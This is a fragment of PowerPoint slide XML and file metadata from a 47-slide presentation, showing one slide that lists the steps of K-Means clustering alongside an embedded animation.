            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId10">
            <a:alphaModFix amt="51000"/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="8044724" y="1486184"/>
            <a:ext cx="4268791" cy="5633927"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="31" name="TextBox 30">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{47D33069-1C98-4328-8798-9F51EF75E6C2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8196832" y="3230748"/>
            <a:ext cx="2596936" cy="2492990"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Verdana" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Verdana" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Verdana" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>K-Means clustering</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="120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pPr marL="171450" indent="-171450">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Verdana" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Verdana" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Verdana" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Decide on number of clusters</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Verdana" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Verdana" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Verdana" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Choose 4 random centres</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Verdana" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Verdana" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Verdana" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Assign data to closest centre</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Verdana" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Verdana" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Verdana" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Move centre chosen to the middle of data assigned</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Verdana" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Verdana" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Verdana" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Assign data to closest centre</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Verdana" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Verdana" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Verdana" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Stop when centres stop moving and number of points assigned to centres don’t change</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="2" name="kmeans ani (convert-video-online.com)">
            <a:hlinkClick r:id="" action="ppaction://media"/>
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F6A8225E-9E76-4868-9812-7828D3762EB5}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr>
            <a:videoFile r:link="rId2"/>
            <p:extLst>
              <p:ext uri="{DAA4B4D4-6D71-4841-9C94-3DE7FCFB9230}">
                <p14:media xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" r:embed="rId1"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId11"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="2444103" y="3050591"/>
            <a:ext cx="3117661" cy="3347425"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2425855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78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2817</TotalTime>
  <Words>5477</Words>
  <Application>Microsoft Office PowerPoint</Application>
  <PresentationFormat>Widescreen</PresentationFormat>
  <Paragraphs>765</Paragraphs>
  <Slides>47</Slides>
  <Notes>46</Notes>
  <HiddenSlides>0</HiddenSlides>
  <MMClips>4</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47</vt:i4>
      </vt:variant>
    </vt:vector>
  </HeadingPairs>
  <TitlesOfParts>
    <vt:vector size="56" baseType="lpstr">
      <vt:lpstr>Arial</vt:lpstr>
      <vt:lpstr>Calibri</vt:lpstr>
      <vt:lpstr>Calibri Light</vt:lpstr>
      <vt:lpstr>Cambria Math</vt:lpstr>
      <vt:lpstr>Montserrat</vt:lpstr>
      <vt:lpstr>Montserrat Light</vt:lpstr>
      <vt:lpstr>Montserrat Ultra Light</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Etienne Greeff</cp:lastModifiedBy>
  <cp:revision>119</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2017-09-12T15:05:14Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2018-06-28T11:19:23Z</dcterms:modified>
</cp:coreProperties>
</file>